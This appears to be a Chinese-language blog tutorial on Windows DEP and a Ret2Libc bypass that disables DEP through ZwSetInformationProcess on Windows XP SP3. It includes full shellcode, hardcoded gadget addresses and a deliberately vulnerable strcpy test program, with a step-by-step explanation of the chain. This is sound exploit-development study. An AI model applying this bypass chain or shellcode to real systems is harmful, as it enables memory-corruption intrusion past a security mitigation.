Windows的DEP保護和簡單的攻擊方法

本文來源：Moeomu的部落格

DEP的介紹

溢位攻擊的根源是未準確區分資料和程式碼，但是重新設計計算機結構是不太可能的事情，所以使用各種辦法去減緩溢位攻擊

原理

• 將資料所在的記憶體頁標為不可執行，而程式成功溢位進入shellcode時，CPU將會丟擲執行異常
• DEP分為軟體DEP和硬體DEP，而軟體DEP指的是SafeSEH，硬體DEP在AMD平臺上稱為No-Execute Page-Protection(NX)，Intel平臺上稱為Execute Disable Bit(XD)
• 作業系統通過設定記憶體頁的NX和XD標記，來指明不能從此執行程式碼，PageTable中插入一個標記來標識此頁是否執行執行指令，0表示允許，1表示不允許

DEP的工作狀態

• Optin：允許系統元件和服務使用DEP，其它程式將不予保護，而使用者可以通過ACT工具標記程式使用DEP，這種保護可以被程式動態關閉，多用於普通使用者作業系統
• Output：為排除列表外的程式啟用DEP，多用於伺服器作業系統
• AlwaysOn：對所有的程式應用DEP保護，不可被關閉，只有64位作業系統才使用此模式
• AlwaysOff：一般不用

編譯選項

/NXCOMPAT編譯選項將在PE頭中設定IMAGE_DLLCHARACTERISTICS_ NX_COMPAT標識，位於IMAGE_OPTIONAL_HEADER中的DllCharacteristics，此值為0x100

時表示啟用DEP

利用Ret2Libc挑戰DEP

原理

• DEP保護時溢位失敗的原因是DEP檢測到程式碼在非可執行頁上執行，如果讓程式直接跳轉到一個已存在的系統函式中，必然不會被攔截
• Ret2Libc是Return-to-libc的簡寫，如果將每條exploit都找到一條在系統lib中的替代品，那麼此exp一定可以正確執行，但問題在於不是每條指令都不包含0，不斷的跳轉容易跳錯地方
• 以下是三個可行的方法
  • 跳轉到ZwSetinfomationProcess函式將DEP關閉，轉入shellcode執行
  • 跳轉到VirtualProtect將shellcode頁面設為可執行，隨後轉入shellcode執行
  • 跳轉到VirtualAlloc申請一段可執行的記憶體空間隨後跳入shellcode執行

嘗試ZwSetinfomationProcess關閉DEP

前置內容

• 一個程序的DEP標識存在於KPROCESS結構的_KEXECUTE_OPTION上，可以通過API函式修改

_KEXECUTE_OPTION結構

Pos0ExecuteDisable:1bit
Pos1ExecuteEnable:1bit
Pos2DisableThunkEmulation:1bit
Pos3Permanent:1bit
Pos4ExecuteDispatchEnable:1bit
Pos5ImageDispatchEnable:1bit
Pos6Spare:2bit

• 當前程序DEP開啟的時候，ExecuteDisable將會被設定為1
• 當前程序DEP關閉的時候，ExecuteEnable將會被設定為1
• DisableThunkEmulation為了相容ATL被設定
• Permanent被置1後表示這些標誌都不能再被修改
• 我們只要將_KEXECUTE_OPTIONS的值設定為0x02(00000010)就可以將ExecuteEnable置為1

shellcode原理

• LdrpCheckNXCompatibility函式為了檢查DEP相容性，滿足以下條件之一將可以關閉DEP
  • DLL受SafeDisc版權保護系統保護
  • DLL中含有.aspack，.pcle，.sforce等位元組的時候
  • DLL存在於登錄檔宣告的不需啟用DEP的模組的時候HKEY_LOCAL_MACHINE\SOFTWARE \Microsoft\ Windows NT\CurrentVersion\Image File Execution Options\DllNXOptions

程式碼

測試環境：系統：Windows XP SP3，DEP狀態：Optout，編譯器：VC6，編譯選項：禁用優化，版本：release

ULONG ExecuteFlags = MEM_EXECUTE_OPTION_ENABLE;

ZwSetInformationProcess(
    NtCurrentProcess(),     // Handle(-1)
    ProcessExecuteFlags,    //0x22
    &ExecuteFlags,          // ptr to 0x2
    sizeof(ExecuteFlags)    //0x4
);

#include <string.h>
#include <windows.h>

char shellcode[] =
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x6B\x61\x6F\x6F\x68\x4D\x69\x73\x61\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x52\xE2\x92\x7C" // mov eax, 1
"\x96\x73\x1B\x5D" // mov ebp, esp & esp+8
"\x1E\xAD\x17\x5D" // esp+0x24
"\xB4\xC1\xC5\x7D" // jmp esp
"\x90\x90\x90\x90"
"\x24\xCD\x93\x7C" // call Close DEP
"\x90\x90\xE9\x2D" // jmp to shellcode start
"\xFF\xFF\xFF\x90"
;

void test()
{
    char tt[176];
    strcpy(tt,shellcode);
}

int main()
{
    HINSTANCE hInst = LoadLibrary("shell32.dll");
    char temp[200];
    test();

    return 0;
}

技術細節

• 需要對比al是否為1，所以第一步retn將會返回到mov eax, 1，retn的地址，此地址將會返回到修繕ebp的位置
• 因為在呼叫函式之前，會訪問ebp中的值，但是它已經被刷寫掉了，所以將修繕ebp，在此使用了push esp，pop ebp，retn三條指令將esp中的地址賦值給ebp，由於retn後面跟著數字，因此ebp將會加上這個數字，也就是ebp+8，此時ebp小於esp了，一旦呼叫子程式將會對棧區進行破壞，所以依舊得將ebp再加上一些，我在此選擇將esp加上0x24，與之前的0x8湊成了0x30的棧空間，這樣在返回的時候將會返回到語句retn 0x24
• retn 0x24語句在返回的時候將會返回到呼叫關閉DEP的函式ZwSetInformationProcess的地方，呼叫完畢後將會使用leave語句並retn，因此它將會返回到jmp esp的地址處
• 由jmp esp跳轉到\x24\xCD\x93\x7C資料存放的地址處，而此垃圾資料將不會影響shellcode的執行
• 在垃圾資料的後方寫入一個跳轉即可，至此跳到shellcode真實執行之處